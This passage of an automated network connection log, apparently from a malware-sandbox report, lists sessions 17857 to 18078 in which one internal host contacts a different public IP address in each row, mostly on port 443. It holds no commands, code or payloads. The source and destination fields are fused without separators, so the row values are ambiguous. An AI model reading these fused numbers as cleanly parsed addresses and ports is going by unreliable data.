                                      17857192.168.2.1455132135.173.235.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17858192.168.2.144643824.235.181.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17859192.168.2.1448634101.205.97.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17860192.168.2.143742086.245.10.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17861192.168.2.145705041.98.151.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17862192.168.2.145925062.41.40.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17863192.168.2.1441378108.44.5.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17864192.168.2.143812878.118.149.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17865192.168.2.143816450.137.102.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17866192.168.2.144853889.154.132.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17867192.168.2.14485322.187.57.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17868192.168.2.1445322171.244.146.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17869192.168.2.1449626113.104.0.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17870192.168.2.143747874.81.24.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17871192.168.2.1445702143.86.222.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17872192.168.2.145663676.19.100.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17873192.168.2.1442528221.31.62.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17874192.168.2.143752459.242.214.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17875192.168.2.145613446.152.200.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17876192.168.2.1451314152.245.233.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17877192.168.2.1460906222.44.152.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17878192.168.2.1454680177.235.101.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17879192.168.2.1454324117.112.143.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17880192.168.2.144599280.144.118.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17881192.168.2.1441254167.199.178.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17882192.168.2.1434580132.79.87.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17883192.168.2.143462635.137.204.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17884192.168.2.1453884188.156.26.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17885192.168.2.14463442.65.79.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17886192.168.2.143466079.129.195.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17887192.168.2.145797845.104.169.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17888192.168.2.1439316117.177.95.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17889192.168.2.144407446.101.22.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17890192.168.2.144245897.176.201.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17891192.168.2.1456508213.8.185.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17892192.168.2.14390445.148.132.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17893192.168.2.1443522148.29.215.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17894192.168.2.1444930110.50.111.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17895192.168.2.1434496212.120.22.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17896192.168.2.1440682141.145.243.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17897192.168.2.1451886120.8.90.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17898192.168.2.144223268.107.5.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17899192.168.2.1444324208.170.18.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17900192.168.2.144338861.24.175.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17901192.168.2.143849280.113.104.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17902192.168.2.1442080205.112.110.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17903192.168.2.1435332134.36.40.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17904192.168.2.1432818171.30.72.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17905192.168.2.1443064114.10.119.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17906192.168.2.144984631.222.2.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17907192.168.2.1443332123.207.64.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17908192.168.2.1459756105.179.43.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17909192.168.2.144107284.246.18.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17910192.168.2.1457904198.57.115.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17911192.168.2.145302212.213.93.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17912192.168.2.1433030218.75.15.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17913192.168.2.146021417.189.83.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17914192.168.2.143935674.193.110.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17915192.168.2.1434884133.127.137.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17916192.168.2.1434426222.119.58.888080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17917192.168.2.144572887.96.65.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17918192.168.2.1457314160.116.90.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17919192.168.2.144728617.41.216.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17920192.168.2.145189618.250.87.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17921192.168.2.143344819.79.156.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17922192.168.2.1459718115.165.92.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17923192.168.2.145732237.100.217.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17924192.168.2.1459560141.229.247.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17925192.168.2.145741661.47.128.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17926192.168.2.14440589.226.143.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17927192.168.2.1442826140.137.206.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17928192.168.2.145429824.128.88.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17929192.168.2.143828078.162.104.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17930192.168.2.1455084135.180.41.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17931192.168.2.145793664.130.148.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17932192.168.2.1460972129.62.197.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17933192.168.2.1440700183.163.126.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17934192.168.2.14581389.9.99.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17935192.168.2.1458280157.215.211.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17936192.168.2.1441808201.126.162.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17937192.168.2.1439896168.202.102.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17938192.168.2.1435892116.129.111.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17939192.168.2.1437918204.177.236.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17940192.168.2.1452208150.174.182.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17941192.168.2.1443312125.153.172.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17942192.168.2.144525643.6.33.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17943192.168.2.1444902104.143.196.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17944192.168.2.1441086187.127.59.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17945192.168.2.1447672140.187.141.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17946192.168.2.144163053.177.219.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17947192.168.2.1442534130.151.206.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17948192.168.2.1443630135.208.120.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17949192.168.2.1454392166.201.216.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17950192.168.2.1447840157.17.116.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17951192.168.2.143985471.50.224.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17952192.168.2.1437460158.8.69.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17953192.168.2.1448520131.133.154.192443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17954192.168.2.1434872174.180.126.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17955192.168.2.1455946163.100.189.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17956192.168.2.144648843.91.83.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17957192.168.2.1450582177.197.20.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17958192.168.2.146022844.230.210.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17959192.168.2.1443526217.159.64.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17960192.168.2.146031037.81.159.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17961192.168.2.1437272179.130.75.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17962192.168.2.144702819.100.178.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17963192.168.2.1448492125.100.184.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17964192.168.2.1457052185.60.41.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17965192.168.2.145043252.106.246.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17966192.168.2.144509879.236.47.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17967192.168.2.1438300110.143.149.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17968192.168.2.145808014.101.232.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17969192.168.2.1434548223.244.162.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17970192.168.2.145833647.124.101.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17971192.168.2.1434344213.229.232.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17972192.168.2.144761652.48.114.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17973192.168.2.1448314123.36.254.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17974192.168.2.1439098141.254.130.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17975192.168.2.143371486.27.45.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17976192.168.2.1448460213.169.64.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17977192.168.2.143672476.103.139.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17978192.168.2.1459606177.79.107.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17979192.168.2.1450258114.69.77.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17980192.168.2.1458186158.140.157.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17981192.168.2.146040225.120.132.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17982192.168.2.14522181.215.140.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17983192.168.2.144666248.25.179.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17984192.168.2.1441398178.104.245.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17985192.168.2.1453960131.226.182.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17986192.168.2.14405465.190.211.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17987192.168.2.1442440193.95.58.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17988192.168.2.1447788216.203.74.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17989192.168.2.1442668197.49.25.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17990192.168.2.1441634167.223.157.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17991192.168.2.145350679.34.152.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17992192.168.2.1459012123.227.223.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17993192.168.2.1440510136.51.68.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17994192.168.2.1433626117.187.208.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17995192.168.2.144244669.223.204.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17996192.168.2.145084672.147.4.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17997192.168.2.143766858.47.146.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17998192.168.2.1449712171.42.79.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      17999192.168.2.14360989.126.204.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18000192.168.2.145071250.158.181.0443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18001192.168.2.1449832217.4.20.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18002192.168.2.1434780186.117.213.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18003192.168.2.145357293.57.138.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18004192.168.2.1456736149.138.122.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18005192.168.2.1460976135.115.117.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18006192.168.2.1453066206.65.245.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18007192.168.2.1459644223.155.64.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18008192.168.2.1438104118.229.72.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18009192.168.2.1451772163.53.174.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18010192.168.2.144548869.243.96.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18011192.168.2.143515671.190.103.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18012192.168.2.145543287.245.216.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18013192.168.2.1432890168.99.109.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18014192.168.2.1459040152.139.74.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18015192.168.2.1454126124.22.226.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18016192.168.2.145590013.9.158.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18017192.168.2.145647043.185.135.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18018192.168.2.145899617.54.136.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18019192.168.2.1443470201.30.112.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18020192.168.2.1450486134.16.111.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18021192.168.2.1455142190.12.107.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18022192.168.2.1446832166.69.139.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18023192.168.2.1459664173.2.129.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18024192.168.2.1458128112.89.10.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18025192.168.2.144656079.229.86.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18026192.168.2.145933454.211.197.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18027192.168.2.1459106124.25.170.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18028192.168.2.1450364211.230.56.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18029192.168.2.145302096.161.154.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18030192.168.2.145664698.163.31.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18031192.168.2.1451068164.207.195.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18032192.168.2.145030066.68.47.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18033192.168.2.1436522160.226.252.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18034192.168.2.1451876167.73.233.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18035192.168.2.1453320192.205.221.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18036192.168.2.144549882.241.39.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18037192.168.2.1454472156.98.212.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18038192.168.2.145312217.178.235.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18039192.168.2.1440322116.201.198.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18040192.168.2.143387447.197.88.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18041192.168.2.1441062165.126.102.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18042192.168.2.145654241.213.229.245443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18043192.168.2.1454360155.100.250.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18044192.168.2.145721657.102.87.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18045192.168.2.144584052.250.173.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18046192.168.2.1447550104.215.237.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18047192.168.2.144824865.72.234.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18048192.168.2.1456840196.107.237.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18049192.168.2.1452806143.219.228.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18050192.168.2.1442342109.39.252.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18051192.168.2.1456244129.31.130.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18052192.168.2.1448356152.22.63.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18053192.168.2.1436826223.58.176.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18054192.168.2.1435394121.66.232.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18055192.168.2.1451720163.73.79.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18056192.168.2.1439190175.46.22.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18057192.168.2.1450650218.54.56.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18058192.168.2.1457158130.104.142.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18059192.168.2.144223662.166.242.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18060192.168.2.1441242166.81.132.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18061192.168.2.1448558152.41.53.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18062192.168.2.1446184173.199.184.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18063192.168.2.1454658170.84.20.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18064192.168.2.1451366118.69.198.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18065192.168.2.143314234.44.114.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18066192.168.2.143930237.193.130.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18067192.168.2.143879663.181.77.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18068192.168.2.144506619.176.23.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18069192.168.2.144273259.112.115.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18070192.168.2.1460472199.23.76.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18071192.168.2.143380043.25.82.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18072192.168.2.1447796212.90.57.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18073192.168.2.145020097.102.168.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18074192.168.2.143400470.40.40.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18075192.168.2.1446070210.142.130.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18076192.168.2.144164059.234.112.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18077192.168.2.145772042.195.68.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      18078192.168.2.14340829.88.117.107443
                                      TimestampBytes transferredDirectionData


